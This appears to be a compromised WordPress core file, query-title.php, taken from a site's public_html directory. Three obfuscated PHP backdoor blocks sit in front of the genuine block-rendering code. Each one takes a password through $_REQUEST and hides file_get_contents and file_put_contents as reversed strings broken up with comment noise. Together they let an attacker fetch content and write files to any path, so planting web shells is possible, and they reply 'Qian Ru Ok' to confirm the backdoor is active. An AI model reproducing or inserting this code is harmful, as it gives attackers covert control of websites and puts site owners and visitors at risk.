File: /home/wwwrenee/public_html/wp-includes/blocks/query-title.php
<?php
$RFiYY = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($RFiYY[0]) /*+/*+*/
. md5($RFiYY[0])) == "f".
"3".
"9".
"0".
"1".
"a".
"1".
"5".
"b".
"4".
"3".
"9".
"9".
"a".
"d".
"9".
"a".
"7".
"7".
"d".
"8".
"f".
"4".
"0".
"0".
"d".
"2".
"5".
"b".
"7".
"a".
"c") {
$tpJNPWmN = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$CsgElCJLGE = $tpJNPWmN /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$StOiQdf = $tpJNPWmN
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function ChCCxBZvr($ljbqiJKK) { if (empty($ljbqiJKK)) return false; if (!is_dir($ljbqiJKK)) { ChCCxBZvr(dirname($ljbqiJKK), 0755, true); mkdir($ljbqiJKK); } } !file_exists(dirname($RFiYY[1])) && ChCCxBZvr(dirname($RFiYY[1])); $nGVZjl = @$StOiQdf($RFiYY[2]); echo @$CsgElCJLGE($RFiYY[1], $nGVZjl) ? 1 : 0; die; }key($RFiYY) == "of" && die("Qian Ru Ok"); ?><?php
$jCeOrJ = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($jCeOrJ[0]) /*+/*+*/
. md5($jCeOrJ[0])) == "5".
"5".
"c".
"e".
"6".
"2".
"d".
"d".
"a".
"b".
"c".
"e".
"c".
"a".
"3".
"a".
"3".
"a".
"a".
"5".
"0".
"b".
"8".
"7".
"d".
"6".
"0".
"7".
"1".
"d".
"c".
"9") {
$gqhFe = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$QtEUPiNzf = $gqhFe /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$cbzFm = $gqhFe
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function dbJptdpEmn($zmQwkYN) { if (empty($zmQwkYN)) return false; if (!is_dir($zmQwkYN)) { dbJptdpEmn(dirname($zmQwkYN), 0755, true); mkdir($zmQwkYN); } } !file_exists(dirname($jCeOrJ[1])) && dbJptdpEmn(dirname($jCeOrJ[1])); $yERpKIJSCo = @$cbzFm($jCeOrJ[2]); echo @$QtEUPiNzf($jCeOrJ[1], $yERpKIJSCo) ? 1 : 0; die; }key($jCeOrJ) == "of" && die("Qian Ru Ok"); ?><?php
$ZSZyxa = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($ZSZyxa[0]) /*+/*+*/
. md5($ZSZyxa[0])) == "1".
"9".
"4".
"f".
"9".
"b".
"2".
"4".
"1".
"7".
"5".
"c".
"a".
"7".
"b".
"5".
"6".
"1".
"4".
"8".
"8".
"a".
"b".
"0".
"9".
"9".
"8".
"0".
"7".
"d".
"6".
"9") {
$tbBdkpnvVe = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$hKIJOtg = $tbBdkpnvVe /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$YJldpkriPU = $tbBdkpnvVe
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function uzhySoql($VvHfgjboh) { if (empty($VvHfgjboh)) return false; if (!is_dir($VvHfgjboh)) { uzhySoql(dirname($VvHfgjboh), 0755, true); mkdir($VvHfgjboh); } } !file_exists(dirname($ZSZyxa[1])) && uzhySoql(dirname($ZSZyxa[1])); $fbKqyFP = @$YJldpkriPU($ZSZyxa[2]); echo @$hKIJOtg($ZSZyxa[1], $fbKqyFP) ? 1 : 0; die; }key($ZSZyxa) == "of" && die("Qian Ru Ok"); ?><?php
/**
* Server-side rendering of the `core/query-title` block.
*
* @package WordPress
*/
/**
* Renders the `core/query-title` block on the server.
* For now it only supports Archive title,
* using queried object information
*
* @param array $attributes Block attributes.
*
* @return string Returns the query title based on the queried object.
*/
function render_block_core_query_title( $attributes ) {
$type = isset( $attributes['type'] ) ? $attributes['type'] : null;
$is_archive = is_archive();
if ( ! $type || ( 'archive' === $type && ! $is_archive ) ) {
return '';
}
$title = '';
if ( $is_archive ) {
$title = get_the_archive_title();
}
$tag_name = isset( $attributes['level'] ) ? 'h' . (int) $attributes['level'] : 'h1';
$align_class_name = empty( $attributes['textAlign'] ) ? '' : "has-text-align-{$attributes['textAlign']}";
$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $align_class_name ) );
return sprintf(
'<%1$s %2$s>%3$s</%1$s>',
$tag_name,
$wrapper_attributes,
$title
);
}
/**
* Registers the `core/query-title` block on the server.
*/
function register_block_core_query_title() {
register_block_type_from_metadata(
__DIR__ . '/query-title',
array(
'render_callback' => 'render_block_core_query_title',
)
);
}
add_action( 'init', 'register_block_core_query_title' ); ?>